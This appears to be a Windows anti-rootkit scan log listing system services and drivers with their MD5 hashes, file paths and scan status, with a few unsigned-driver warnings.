13:29:04.0269 4240	aic78xx (ae1fdf7bf7bb6c6a70f67699d880592a) C:\Windows\system32\drivers\djsvs.sys
13:29:04.0285 4240	aic78xx - ok
13:29:04.0447 4240	ALG (a1545b731579895d8cc44fc0481c1192) C:\Windows\System32\alg.exe
13:29:04.0540 4240	ALG - ok
13:29:04.0564 4240	aliide (90395b64600ebb4552e26e178c94b2e4) C:\Windows\system32\drivers\aliide.sys
13:29:04.0578 4240	aliide - ok
13:29:04.0602 4240	amdagp (2b13e304c9dfdfa5eb582f6a149fa2c7) C:\Windows\system32\drivers\amdagp.sys
13:29:04.0617 4240	amdagp - ok
13:29:04.0655 4240	amdide (0577df1d323fe75a739c787893d300ea) C:\Windows\system32\drivers\amdide.sys
13:29:04.0670 4240	amdide - ok
13:29:04.0730 4240	AmdK7 (dc487885bcef9f28eece6fac0e5ddfc5) C:\Windows\system32\drivers\amdk7.sys
13:29:04.0846 4240	AmdK7 - ok
13:29:04.0974 4240	AmdK8 (93ae7f7dd54ab986a6f1a1b37be7442d) C:\Windows\system32\DRIVERS\amdk8.sys
13:29:05.0053 4240	AmdK8 - ok
13:29:05.0099 4240	ApfiltrService (7c2f57bce81fa74933f0e1c84a97c9db) C:\Windows\system32\DRIVERS\Apfiltr.sys
13:29:05.0238 4240	ApfiltrService - ok
13:29:05.0378 4240	AppHostSvc (dfae18c675d71fd06d57dc69d2913975) C:\Windows\system32\inetsrv\apphostsvc.dll
13:29:05.0468 4240	AppHostSvc - ok
13:29:05.0522 4240	Appinfo (c6d704c7f0434dc791aac37cac4b6e14) C:\Windows\System32\appinfo.dll
13:29:05.0566 4240	Appinfo - ok
13:29:05.0799 4240	Apple Mobile Device (7ef47644b74ebe721cc32211d3c35e76) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
13:29:05.0813 4240	Apple Mobile Device - ok
13:29:05.0933 4240	arc (5f673180268bb1fdb69c99b6619fe379) C:\Windows\system32\drivers\arc.sys
13:29:05.0948 4240	arc - ok
13:29:06.0036 4240	arcsas (957f7540b5e7f602e44648c7de5a1c05) C:\Windows\system32\drivers\arcsas.sys
13:29:06.0051 4240	arcsas - ok
13:29:06.0135 4240	AsyncMac (53b202abee6455406254444303e87be1) C:\Windows\system32\DRIVERS\asyncmac.sys
13:29:06.0230 4240	AsyncMac - ok
13:29:06.0265 4240	atapi (1f05b78ab91c9075565a9d8a4b880bc4) C:\Windows\system32\drivers\atapi.sys
13:29:06.0281 4240	atapi - ok
13:29:06.0459 4240	athr (8be56f8300e1c37b578da23c71816b7a) C:\Windows\system32\DRIVERS\athr.sys
13:29:06.0569 4240	athr - ok
13:29:06.0629 4240	Ati External Event Utility (59991b5ec50e106634a16444594c305e) C:\Windows\system32\Ati2evxx.exe
13:29:06.0696 4240	Ati External Event Utility - ok
13:29:06.0974 4240	atikmdag (fab37c8e4b55235de9055026561dcc7f) C:\Windows\system32\DRIVERS\atikmdag.sys
13:29:07.0240 4240	atikmdag - ok
13:29:07.0631 4240	AudioEndpointBuilder (68e2a1a0407a66cf50da0300852424ab) C:\Windows\System32\Audiosrv.dll
13:29:07.0681 4240	AudioEndpointBuilder - ok
13:29:07.0687 4240	Audiosrv (68e2a1a0407a66cf50da0300852424ab) C:\Windows\System32\Audiosrv.dll
13:29:07.0718 4240	Audiosrv - ok
13:29:07.0737 4240	axsaki - ok
13:29:07.0792 4240	Beep (67e506b75bd5326a3ec7b70bd014dfb6) C:\Windows\system32\drivers\Beep.sys
13:29:07.0853 4240	Beep - ok
13:29:07.0932 4240	BFE (c789af0f724fda5852fb9a7d3a432381) C:\Windows\System32\bfe.dll
13:29:07.0990 4240	BFE - ok
13:29:08.0159 4240	BITS (93952506c6d67330367f7e7934b6a02f) C:\Windows\system32\qmgr.dll
13:29:08.0292 4240	BITS - ok
13:29:08.0296 4240	blbdrive - ok
13:29:08.0730 4240	Bonjour Service (db5bea73edaf19ac68b2c0fad0f92b1a) C:\Program Files\Bonjour\mDNSResponder.exe
13:29:08.0753 4240	Bonjour Service - ok
13:29:08.0850 4240	bowser (35f376253f687bde63976ccb3f2108ca) C:\Windows\system32\DRIVERS\bowser.sys
13:29:08.0967 4240	bowser - ok
13:29:08.0994 4240	BrFiltLo (9f9acc7f7ccde8a15c282d3f88b43309) C:\Windows\system32\drivers\brfiltlo.sys
13:29:09.0031 4240	BrFiltLo - ok
13:29:09.0050 4240	BrFiltUp (56801ad62213a41f6497f96dee83755a) C:\Windows\system32\drivers\brfiltup.sys
13:29:09.0101 4240	BrFiltUp - ok
13:29:09.0224 4240	Browser (a3629a0c4226f9e9c72faaeebc3ad33c) C:\Windows\System32\browser.dll
13:29:09.0274 4240	Browser - ok
13:29:09.0300 4240	Brserid (b304e75cff293029eddf094246747113) C:\Windows\system32\drivers\brserid.sys
13:29:09.0391 4240	Brserid - ok
13:29:09.0485 4240	BrSerWdm (203f0b1e73adadbbb7b7b1fabd901f6b) C:\Windows\system32\drivers\brserwdm.sys
13:29:09.0572 4240	BrSerWdm - ok
13:29:09.0611 4240	BrUsbMdm (bd456606156ba17e60a04e18016ae54b) C:\Windows\system32\drivers\brusbmdm.sys
13:29:09.0709 4240	BrUsbMdm - ok
13:29:09.0732 4240	BrUsbSer (af72ed54503f717a43268b3cc5faec2e) C:\Windows\system32\drivers\brusbser.sys
13:29:09.0821 4240	BrUsbSer - ok
13:29:09.0851 4240	BTHMODEM (ad07c1ec6665b8b35741ab91200c6b68) C:\Windows\system32\drivers\bthmodem.sys
13:29:09.0921 4240	BTHMODEM - ok
13:29:10.0212 4240	BVRPMPR5 (248dfa5762dde38dfddbbd44149e9d7a) C:\Windows\system32\drivers\BVRPMPR5.SYS
13:29:10.0337 4240	BVRPMPR5 ( UnsignedFile.Multi.Generic ) - warning
13:29:10.0338 4240	BVRPMPR5 - detected UnsignedFile.Multi.Generic (1)
13:29:10.0342 4240	catchme - ok
13:29:10.0472 4240	cdfs (7add03e75beb9e6dd102c3081d29840a) C:\Windows\system32\DRIVERS\cdfs.sys
13:29:10.0546 4240	cdfs - ok
13:29:10.0610 4240	cdrom (6b4bffb9becd728097024276430db314) C:\Windows\system32\DRIVERS\cdrom.sys
13:29:10.0664 4240	cdrom - ok
13:29:10.0831 4240	CertPropSvc (312ec3e37a0a1f2006534913e37b4423) C:\Windows\System32\certprop.dll
13:29:10.0856 4240	CertPropSvc - ok
13:29:11.0084 4240	circlass (da8e0afc7baa226c538ef53ac2f90897) C:\Windows\system32\drivers\circlass.sys
13:29:11.0155 4240	circlass - ok
13:29:11.0399 4240	CLFS (d7659d3b5b92c31e84e53c1431f35132) C:\Windows\system32\CLFS.sys
13:29:11.0419 4240	CLFS - ok
13:29:11.0664 4240	clr_optimization_v2.0.50727_32 (8ee772032e2fe80a924f3b8dd5082194) C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
13:29:11.0679 4240	clr_optimization_v2.0.50727_32 - ok
13:29:11.0965 4240	clr_optimization_v4.0.30319_32 (c5a75eb48e2344abdc162bda79e16841) C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
13:29:11.0982 4240	clr_optimization_v4.0.30319_32 - ok
13:29:12.0097 4240	CmBatt (99afc3795b58cc478fbbbcdc658fcb56) C:\Windows\system32\DRIVERS\CmBatt.sys
13:29:12.0139 4240	CmBatt - ok
13:29:12.0262 4240	cmdide (45201046c776ffdaf3fc8a0029c581c8) C:\Windows\system32\drivers\cmdide.sys
13:29:12.0276 4240	cmdide - ok
13:29:12.0359 4240	Compbatt (6afef0b60fa25de07c0968983ee4f60a) C:\Windows\system32\DRIVERS\compbatt.sys
13:29:12.0374 4240	Compbatt - ok
13:29:12.0381 4240	COMSysApp - ok
13:29:12.0404 4240	crcdisk (2a213ae086bbec5e937553c7d9a2b22c) C:\Windows\system32\drivers\crcdisk.sys
13:29:12.0418 4240	crcdisk - ok
13:29:12.0464 4240	Crusoe (22a7f883508176489f559ee745b5bf5d) C:\Windows\system32\drivers\crusoe.sys
13:29:12.0587 4240	Crusoe - ok
13:29:12.0695 4240	CryptSvc (fb27772beaf8e1d28ccd825c09da939b) C:\Windows\system32\cryptsvc.dll
13:29:12.0736 4240	CryptSvc - ok
13:29:12.0824 4240	DcomLaunch (3b5b4d53fec14f7476ca29a20cc31ac9) C:\Windows\system32\rpcss.dll
13:29:12.0902 4240	DcomLaunch - ok
13:29:12.0953 4240	DfsC (622c41a07ca7e6dd91770f50d532cb6c) C:\Windows\system32\Drivers\dfsc.sys
13:29:13.0008 4240	DfsC - ok
13:29:13.0207 4240	DFSR (2cc3dcfb533a1035b13dcab6160ab38b) C:\Windows\system32\DFSR.exe
13:29:13.0372 4240	DFSR - ok
13:29:13.0869 4240	Dhcp (9028559c132146fb75eb7acf384b086a) C:\Windows\System32\dhcpcsvc.dll
13:29:13.0924 4240	Dhcp - ok
13:29:14.0155 4240	disk (5d4aefc3386920236a548271f8f1af6a) C:\Windows\system32\drivers\disk.sys
13:29:14.0172 4240	disk - ok
13:29:14.0450 4240	dldtCATSCustConnectService (31b7596edd9505fcbb07670fb69cbb48) C:\Windows\system32\spool\DRIVERS\W32X86\3\\dldtserv.exe
13:29:14.0465 4240	dldtCATSCustConnectService - ok
13:29:14.0474 4240	dldt_device - ok
13:29:14.0536 4240	Dnscache (57d762f6f5974af0da2be88a3349baaa) C:\Windows\System32\dnsrslvr.dll
13:29:14.0642 4240	Dnscache - ok
13:29:14.0809 4240	dot3svc (324fd74686b1ef5e7c19a8af49e748f6) C:\Windows\System32\dot3svc.dll
13:29:14.0865 4240	dot3svc - ok
13:29:14.0930 4240	DPS (a622e888f8aa2f6b49e9bc466f0e5def) C:\Windows\system32\dps.dll
13:29:14.0984 4240	DPS - ok
13:29:15.0028 4240	drmkaud (97fef831ab90bee128c9af390e243f80) C:\Windows\system32\drivers\drmkaud.sys
13:29:15.0053 4240	drmkaud - ok
13:29:15.0276 4240	DXGKrnl (c68ac676b0ef30cfbb1080adce49eb1f) C:\Windows\System32\drivers\dxgkrnl.sys
13:29:15.0308 4240	DXGKrnl - ok
13:29:15.0411 4240	E1G60 (f88fb26547fd2ce6d0a5af2985892c48) C:\Windows\system32\DRIVERS\E1G60I32.sys
13:29:15.0469 4240	E1G60 - ok
13:29:15.0597 4240	EapHost (c0b95e40d85cd807d614e264248a45b9) C:\Windows\System32\eapsvc.dll
13:29:15.0675 4240	EapHost - ok
13:29:15.0786 4240	Ecache (7f64ea048dcfac7acf8b4d7b4e6fe371) C:\Windows\system32\drivers\ecache.sys
13:29:15.0805 4240	Ecache - ok
13:29:15.0949 4240	ehRecvr (9be3744d295a7701eb425332014f0797) C:\Windows\ehome\ehRecvr.exe
13:29:15.0990 4240	ehRecvr - ok
13:29:16.0031 4240	ehSched (ad1870c8e5d6dd340c829e6074bf3c3f) C:\Windows\ehome\ehsched.exe
13:29:16.0109 4240	ehSched - ok
13:29:16.0131 4240	ehstart (c27c4ee8926e74aa72efcab24c5242c3) C:\Windows\ehome\ehstart.dll
13:29:16.0146 4240	ehstart - ok
13:29:16.0296 4240	ElbyCDIO (aaa8999a169e39fb8b48ae49cd6ac30a) C:\Windows\system32\Drivers\ElbyCDIO.sys
13:29:16.0339 4240	ElbyCDIO - ok
13:29:16.0379 4240	ElbyDelay (e205c313417da6fa7afe85912a310a65) C:\Windows\system32\Drivers\ElbyDelay.sys
13:29:16.0392 4240	ElbyDelay - ok
13:29:16.0474 4240	elxstor (e8f3f21a71720c84bcf423b80028359f) C:\Windows\system32\drivers\elxstor.sys
13:29:16.0494 4240	elxstor - ok
13:29:16.0635 4240	EMDMgmt (4e6b23dfc917ea39306b529b773950f4) C:\Windows\system32\emdmgmt.dll
13:29:16.0740 4240	EMDMgmt - ok
13:29:16.0815 4240	EventSystem (67058c46504bc12d821f38cf99b7b28f) C:\Windows\system32\es.dll
13:29:16.0874 4240	EventSystem - ok
13:29:16.0931 4240	exfat (22b408651f9123527bcee54b4f6c5cae) C:\Windows\system32\drivers\exfat.sys
13:29:16.0989 4240	exfat - ok
13:29:17.0097 4240	fastfat (1e9b9a70d332103c52995e957dc09ef8) C:\Windows\system32\drivers\fastfat.sys
13:29:17.0123 4240	fastfat - ok
13:29:17.0190 4240	fdc (63bdada84951b9c03e641800e176898a) C:\Windows\system32\DRIVERS\fdc.sys
13:29:17.0288 4240	fdc - ok
13:29:17.0323 4240	fdPHost (6629b5f0e98151f4afdd87567ea32ba3) C:\Windows\system32\fdPHost.dll
13:29:17.0456 4240	fdPHost - ok
13:29:17.0497 4240	FDResPub (89ed56dce8e47af40892778a5bd31fd2) C:\Windows\system32\fdrespub.dll
13:29:17.0556 4240	FDResPub - ok
13:29:17.0682 4240	FileInfo (a8c0139a884861e3aae9cfe73b208a9f) C:\Windows\system32\drivers\fileinfo.sys
13:29:17.0699 4240	FileInfo - ok
13:29:17.0730 4240	Filetrace (0ae429a696aecbc5970e3cf2c62635ae) C:\Windows\system32\drivers\filetrace.sys
13:29:17.0774 4240	Filetrace - ok
13:29:17.0805 4240	flpydisk (6603957eff5ec62d25075ea8ac27de68) C:\Windows\system32\DRIVERS\flpydisk.sys
13:29:17.0886 4240	flpydisk - ok
13:29:17.0938 4240	FltMgr (01334f9ea68e6877c4ef05d3ea8abb05) C:\Windows\system32\drivers\fltmgr.sys
13:29:17.0957 4240	FltMgr - ok
13:29:18.0398 4240	FontCache (8ce364388c8eca59b14b539179276d44) C:\Windows\system32\FntCache.dll
13:29:18.0470 4240	FontCache - ok
13:29:18.0590 4240	FontCache3.0.0.0 (c7fbdd1ed42f82bfa35167a5c9803ea3) C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
13:29:18.0604 4240	FontCache3.0.0.0 - ok
13:29:18.0671 4240	Fs_Rec (b972a66758577e0bfd1de0f91aaa27b5) C:\Windows\system32\drivers\Fs_Rec.sys
13:29:18.0765 4240	Fs_Rec - ok
13:29:18.0825 4240	gagp30kx (4e1cd0a45c50a8882616cae5bf82f3c5) C:\Windows\system32\drivers\gagp30kx.sys
13:29:18.0841 4240	gagp30kx - ok
13:29:18.0876 4240	GEARAspiWDM (8182ff89c65e4d38b2de4bb0fb18564e) C:\Windows\system32\Drivers\GEARAspiWDM.sys
13:29:18.0890 4240	GEARAspiWDM - ok
13:29:19.0004 4240	Giraffic - ok
13:29:19.0275 4240	gpsvc (cd5d0aeee35dfd4e986a5aa1500a6e66) C:\Windows\System32\gpsvc.dll
13:29:19.0337 4240	gpsvc - ok
13:29:19.0397 4240	gusvc (751c1d2ca2abf4a9f5a6b8d7d45b907c) C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe
13:29:19.0414 4240	gusvc - ok
13:29:19.0710 4240	HdAudAddService (cb04c744be0a61b1d648faed182c3b59) C:\Windows\system32\drivers\HdAudio.sys
13:29:19.0786 4240	HdAudAddService - ok
13:29:19.0984 4240	HDAudBus (062452b7ffd68c8c042a6261fe8dff4a) C:\Windows\system32\DRIVERS\HDAudBus.sys
13:29:20.0059 4240	HDAudBus - ok
13:29:20.0123 4240	HidBth (1338520e78d90154ed6be8f84de5fceb) C:\Windows\system32\drivers\hidbth.sys
13:29:20.0213 4240	HidBth - ok
13:29:20.0263 4240	HidIr (ff3160c3a2445128c5a6d9b076da519e) C:\Windows\system32\drivers\hidir.sys
13:29:20.0341 4240	HidIr - ok
13:29:20.0435 4240	hidserv (84067081f3318162797385e11a8f0582) C:\Windows\System32\hidserv.dll
13:29:20.0527 4240	hidserv - ok
13:29:20.0676 4240	HidUsb (cca4b519b17e23a00b826c55716809cc) C:\Windows\system32\DRIVERS\hidusb.sys
13:29:20.0783 4240	HidUsb - ok
13:29:21.0023 4240	hkmsvc (d8ad255b37da92434c26e4876db7d418) C:\Windows\system32\kmsvc.dll
13:29:21.0065 4240	hkmsvc - ok
13:29:21.0157 4240	HpCISSs (df353b401001246853763c4b7aaa6f50) C:\Windows\system32\drivers\hpcisss.sys
13:29:21.0172 4240	HpCISSs - ok
13:29:21.0250 4240	HTTP (f870aa3e254628ebeafe754108d664de) C:\Windows\system32\drivers\HTTP.sys
13:29:21.0315 4240	HTTP - ok
13:29:21.0332 4240	i2omp (324c2152ff2c61abae92d09f3cca4d63) C:\Windows\system32\drivers\i2omp.sys
13:29:21.0347 4240	i2omp - ok
13:29:21.0432 4240	i8042prt (22d56c8184586b7a1f6fa60be5f5a2bd) C:\Windows\system32\DRIVERS\i8042prt.sys
13:29:21.0457 4240	i8042prt - ok
13:29:21.0495 4240	iaStorV (c957bf4b5d80b46c5017bf0101e6c906) C:\Windows\system32\drivers\iastorv.sys
13:29:21.0514 4240	iaStorV - ok
13:29:21.0619 4240	IDriverT (6f95324909b502e2651442c1548ab12f) C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
13:29:21.0657 4240	IDriverT ( UnsignedFile.Multi.Generic ) - warning
13:29:21.0657 4240	IDriverT - detected UnsignedFile.Multi.Generic (1)
13:29:21.0856 4240	idsvc (98477b08e61945f974ed9fdc4cb6bdab) C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\infocard.exe
13:29:21.0979 4240	idsvc - ok
13:29:22.0113 4240	iirsp (2d077bf86e843f901d8db709c95b49a5) C:\Windows\system32\drivers\iirsp.sys
13:29:22.0128 4240	iirsp - ok
13:29:22.0205 4240	IKEEXT (9908d8a397b76cd8d31d0d383c5773c9) C:\Windows\System32\ikeext.dll
13:29:22.0293 4240	IKEEXT - ok
13:29:22.0556 4240	IntcAzAudAddService (7bd4e0428776d11c8e8e26f9f5508690) C:\Windows\system32\drivers\RTKVHDA.sys
13:29:22.0772 4240	IntcAzAudAddService - ok
13:29:23.0008 4240	intelide (97469037714070e45194ed318d636401) C:\Windows\system32\drivers\intelide.sys
13:29:23.0024 4240	intelide - ok
13:29:23.0055 4240	intelppm (ce44cc04262f28216dd4341e9e36a16f) C:\Windows\system32\DRIVERS\intelppm.sys
13:29:23.0103 4240	intelppm - ok
13:29:23.0167 4240	IPBusEnum (9ac218c6e6105477484c6fdbe7d409a4) C:\Windows\system32\ipbusenum.dll
13:29:23.0222 4240	IPBusEnum - ok
13:29:23.0367 4240	IpFilterDriver (62c265c38769b864cb25b4bcf62df6c3) C:\Windows\system32\DRIVERS\ipfltdrv.sys
13:29:23.0416 4240	IpFilterDriver - ok
13:29:23.0558 4240	iphlpsvc (1998bd97f950680bb55f55a7244679c2) C:\Windows\System32\iphlpsvc.dll
13:29:23.0594 4240	iphlpsvc - ok
13:29:23.0599 4240	IpInIp - ok
13:29:23.0647 4240	IPMIDRV (40f34f8aba2a015d780e4b09138b6c17) C:\Windows\system32\drivers\ipmidrv.sys
13:29:25.0505 4240	IPMIDRV - ok
13:29:25.0568 4240	IPNAT (8793643a67b42cec66490b2a0cf92d68) C:\Windows\system32\DRIVERS\ipnat.sys
13:29:25.0630 4240	IPNAT - ok
13:29:25.0809 4240	iPod Service (57edb35ea2feca88f8b17c0c095c9a56) C:\Program Files\iPod\bin\iPodService.exe
13:29:25.0856 4240	iPod Service - ok
13:29:25.0906 4240	IRENUM (109c0dfb82c3632fbd11949b73aeeac9) C:\Windows\system32\drivers\irenum.sys
13:29:25.0963 4240	IRENUM - ok
13:29:26.0101 4240	isapnp (350fca7e73cf65bcef43fae1e4e91293) C:\Windows\system32\drivers\isapnp.sys
13:29:26.0116 4240	isapnp - ok
13:29:26.0193 4240	iScsiPrt (232fa340531d940aac623b121a595034) C:\Windows\system32\DRIVERS\msiscsi.sys
13:29:26.0213 4240	iScsiPrt - ok
13:29:26.0252 4240	iteatapi (bced60d16156e428f8df8cf27b0df150) C:\Windows\system32\drivers\iteatapi.sys
13:29:26.0266 4240	iteatapi - ok
13:29:26.0357 4240	iteraid (06fa654504a498c30adca8bec4e87e7e) C:\Windows\system32\drivers\iteraid.sys
13:29:26.0372 4240	iteraid - ok
13:29:26.0437 4240	kbdclass (37605e0a8cf00cbba538e753e4344c6e) C:\Windows\system32\DRIVERS\kbdclass.sys
13:29:26.0454 4240	kbdclass - ok
13:29:26.0544 4240	kbdhid (ede59ec70e25c24581add1fbec7325f7) C:\Windows\system32\DRIVERS\kbdhid.sys
13:29:26.0584 4240	kbdhid - ok
13:29:26.0625 4240	KeyIso (a3e186b4b935905b829219502557314e) C:\Windows\system32\lsass.exe
13:29:26.0670 4240	KeyIso - ok
13:29:26.0789 4240	KR10I (1e0d65f7ffeb4e99b2eec1ccb5754cc8) C:\Windows\system32\drivers\kr10i.sys
13:29:26.0832 4240	KR10I ( UnsignedFile.Multi.Generic ) - warning
13:29:26.0832 4240	KR10I - detected UnsignedFile.Multi.Generic (1)
13:29:26.0877 4240	KR10N (a1963360e74931222a67356c8ad48378) C:\Windows\system32\drivers\kr10n.sys
13:29:26.0901 4240	KR10N ( UnsignedFile.Multi.Generic ) - warning
13:29:26.0901 4240	KR10N - detected UnsignedFile.Multi.Generic (1)
13:29:26.0950 4240	KR3NPXP (485e005cd51ff502fb16483eb4b69c17) C:\Windows\system32\drivers\kr3npxp.sys
13:29:27.0010 4240	KR3NPXP ( UnsignedFile.Multi.Generic ) - warning
13:29:27.0010 4240	KR3NPXP - detected UnsignedFile.Multi.Generic (1)
13:29:27.0173 4240	KSecDD (2b2f1638466e8cb091400c9019cc730e) C:\Windows\system32\Drivers\ksecdd.sys
13:29:27.0216 4240	KSecDD - ok
13:29:27.0303 4240	KtmRm (8078f8f8f7a79e2e6b494523a828c585) C:\Windows\system32\msdtckrm.dll
13:29:27.0392 4240	KtmRm - ok
13:29:27.0505 4240	LanmanServer (1bf5eebfd518dd7298434d8c862f825d) C:\Windows\System32\srvsvc.dll
13:29:27.0572 4240	LanmanServer - ok
13:29:27.0645 4240	LanmanWorkstation (1db69705b695b987082c8baec0c6b34f) C:\Windows\System32\wkssvc.dll
13:29:27.0689 4240	LanmanWorkstation - ok
13:29:27.0742 4240	lltdio (d1c5883087a0c3f1344d9d55a44901f6) C:\Windows\system32\DRIVERS\lltdio.sys
13:29:27.0785 4240	lltdio - ok
13:29:27.0897 4240	lltdsvc (2d5a428872f1442631d0959a34abff63) C:\Windows\System32\lltdsvc.dll
13:29:27.0960 4240	lltdsvc - ok
13:29:28.0011 4240	lmhosts (35d40113e4a5b961b6ce5c5857702518) C:\Windows\System32\lmhsvc.dll
13:29:28.0103 4240	lmhosts - ok
13:29:28.0124 4240	LPCFilter (515fc18cabee0158a324b08b1c2667cf) C:\Windows\system32\DRIVERS\LPCFilter.sys
13:29:28.0154 4240	LPCFilter - ok
13:29:28.0186 4240	LSI_FC (a2262fb9f28935e862b4db46438c80d2) C:\Windows\system32\drivers\lsi_fc.sys
13:29:28.0201 4240	LSI_FC - ok
13:29:28.0215 4240	LSI_SAS (30d73327d390f72a62f32c103daf1d6d) C:\Windows\system32\drivers\lsi_sas.sys
13:29:28.0258 4240	LSI_SAS - ok
13:29:28.0273 4240	LSI_SCSI (e1e36fefd45849a95f1ab81de0159fe3) C:\Windows\system32\drivers\lsi_scsi.sys
13:29:28.0274 4240	LSI_SCSI - ok
13:29:28.0398 4240	luafv (8f5c7426567798e62a3b3614965d62cc) C:\Windows\system32\drivers\luafv.sys
13:29:28.0468 4240	luafv - ok
13:29:28.0654 4240	McAfee SiteAdvisor Service (6c3d154fff0a97a6c3d9f78d60c41655) c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe
13:29:28.0671 4240	McAfee SiteAdvisor Service - ok
13:29:28.0748 4240	Mcx2Svc (aef9babb8a506bc4ce0451a64aaded46) C:\Windows\system32\Mcx2Svc.dll
13:29:28.0765 4240	Mcx2Svc - ok
13:29:28.0913 4240	MDM (11f714f85530a2bd134074dc30e99fca) C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
13:29:28.0933 4240	MDM - ok
13:29:28.0997 4240	megasas (d153b14fc6598eae8422a2037553adce) C:\Windows\system32\drivers\megasas.sys
13:29:29.0015 4240	megasas - ok
13:29:29.0094 4240	MMCSS (1076ffcffaae8385fd62dfcb25ac4708) C:\Windows\system32\mmcss.dll
13:29:29.0228 4240	MMCSS - ok
13:29:29.0260 4240	Modem (e13b5ea0f51ba5b1512ec671393d09ba) C:\Windows\system32\drivers\modem.sys
13:29:29.0339 4240	Modem - ok
13:29:29.0372 4240	monitor (0a9bb33b56e294f686abb7c1e4e2d8a8) C:\Windows\system32\DRIVERS\monitor.sys
13:29:29.0427 4240	monitor - ok
13:29:29.0470 4240	mouclass (5bf6a1326a335c5298477754a506d263) C:\Windows\system32\DRIVERS\mouclass.sys
13:29:29.0487 4240	mouclass - ok
13:29:29.0502 4240	mouhid (93b8d4869e12cfbe663915502900876f) C:\Windows\system32\DRIVERS\mouhid.sys
13:29:29.0567 4240	mouhid - ok
13:29:29.0615 4240	MountMgr (bdafc88aa6b92f7842416ea6a48e1600) C:\Windows\system32\drivers\mountmgr.sys
13:29:29.0632 4240	MountMgr - ok
13:29:29.0677 4240	MpFilter (d993bea500e7382dc4e760bf4f35efcb) C:\Windows\system32\DRIVERS\MpFilter.sys
13:29:29.0697 4240	MpFilter - ok
13:29:29.0742 4240	mpio (583a41f26278d9e0ea548163d6139397) C:\Windows\system32\drivers\mpio.sys
13:29:29.0758 4240	mpio - ok
13:29:29.0810 4240	mpsdrv (22241feba9b2defa669c8cb0a8dd7d2e) C:\Windows\system32\drivers\mpsdrv.sys
13:29:29.0854 4240	mpsdrv - ok
13:29:29.0929 4240	MpsSvc (5de62c6e9108f14f6794060a9bdecaec) C:\Windows\system32\mpssvc.dll
13:29:30.0093 4240	MpsSvc - ok
13:29:30.0140 4240	Mraid35x (4fbbb70d30fd20ec51f80061703b001e) C:\Windows\system32\drivers\mraid35x.sys
13:29:30.0154 4240	Mraid35x - ok
13:29:30.0230 4240	MRxDAV (82cea0395524aacfeb58ba1448e8325c) C:\Windows\system32\drivers\mrxdav.sys
13:29:30.0271 4240	MRxDAV - ok
13:29:30.0336 4240	mrxsmb (1e94971c4b446ab2290deb71d01cf0c2) C:\Windows\system32\DRIVERS\mrxsmb.sys
13:29:30.0406 4240	mrxsmb - ok
13:29:30.0433 4240	mrxsmb10 (4fccb34d793b116423209c0f8b7a3b03) C:\Windows\system32\DRIVERS\mrxsmb10.sys
13:29:30.0538 4240	mrxsmb10 - ok
13:29:30.0574 4240	mrxsmb20 (c3cb1b40ad4a0124d617a1199b0b9d7c) C:\Windows\system32\DRIVERS\mrxsmb20.sys
13:29:30.0591 4240	mrxsmb20 - ok
13:29:30.0632 4240	msahci (742aed7939e734c36b7e8d6228ce26b7) C:\Windows\system32\drivers\msahci.sys
13:29:30.0646 4240	msahci - ok
13:29:30.0714 4240	msdsm (3fc82a2ae4cc149165a94699183d3028) C:\Windows\system32\drivers\msdsm.sys
13:29:30.0730 4240	msdsm - ok
13:29:30.0822 4240	MSDTC (fd7520cc3a80c5fc8c48852bb24c6ded) C:\Windows\System32\msdtc.exe
13:29:30.0908 4240	MSDTC - ok
13:29:30.0960 4240	Msfs (a9927f4a46b816c92f461acb90cf8515) C:\Windows\system32\drivers\Msfs.sys
13:29:31.0008 4240	Msfs - ok
13:29:31.0035 4240	msisadrv (0f400e306f385c56317357d6dea56f62) C:\Windows\system32\drivers\msisadrv.sys
13:29:31.0052 4240	msisadrv - ok
13:29:31.0115 4240	MSiSCSI (85466c0757a23d9a9aecdc0755203cb2) C:\Windows\system32\iscsiexe.dll
13:29:31.0150 4240	MSiSCSI - ok
13:29:31.0155 4240	msiserver - ok
13:29:31.0208 4240	MSKSSRV (d8c63d34d9c9e56c059e24ec7185cc07) C:\Windows\system32\drivers\MSKSSRV.sys
13:29:31.0266 4240	MSKSSRV - ok
13:29:31.0424 4240	MsMpSvc (24516bf4e12a46cb67302e2cdcb8cddf) c:\Program Files\Microsoft Security Client\MsMpEng.exe
13:29:31.0431 4240	MsMpSvc - ok
13:29:31.0495 4240	MSPCLOCK (1d373c90d62ddb641d50e55b9e78d65e) C:\Windows\system32\drivers\MSPCLOCK.sys
13:29:31.0550 4240	MSPCLOCK - ok
13:29:31.0569 4240	MSPQM (b572da05bf4e098d4bba3a4734fb505b) C:\Windows\system32\drivers\MSPQM.sys
13:29:31.0668 4240	MSPQM - ok
13:29:31.0753 4240	MsRPC (b49456d70555de905c311bcda6ec6adb) C:\Windows\system32\drivers\MsRPC.sys
13:29:31.0773 4240	MsRPC - ok
13:29:31.0846 4240	mssmbios (e384487cb84be41d09711c30ca79646c) C:\Windows\system32\DRIVERS\mssmbios.sys
13:29:31.0867 4240	mssmbios - ok
13:29:31.0950 4240	MSTEE (7199c1eec1e4993caf96b8c0a26bd58a) C:\Windows\system32\drivers\MSTEE.sys
13:29:31.0982 4240	MSTEE - ok
13:29:32.0039 4240	Mup (6a57b5733d4cb702c8ea4542e836b96c) C:\Windows\system32\Drivers\mup.sys
13:29:32.0058 4240	Mup - ok
13:29:32.0219 4240	napagent (e4eaf0c5c1b41b5c83386cf212ca9584) C:\Windows\system32\qagentRT.dll
13:29:32.0276 4240	napagent - ok
13:29:32.0329 4240	NativeWifiP (85c44fdff9cf7e72a40dcb7ec06a4416) C:\Windows\system32\DRIVERS\nwifi.sys
13:29:32.0348 4240	NativeWifiP - ok
13:29:32.0399 4240	NCHSSVAD (0df9cc7b5cc173f545723f23e68fac93) C:\Windows\system32\drivers\nchssvad.sys
13:29:32.0456 4240	NCHSSVAD ( UnsignedFile.Multi.Generic ) - warning
13:29:32.0456 4240	NCHSSVAD - detected UnsignedFile.Multi.Generic (1)
13:29:32.0505 4240	NDIS (1357274d1883f68300aeadd15d7bbb42) C:\Windows\system32\drivers\ndis.sys
13:29:32.0534 4240	NDIS - ok
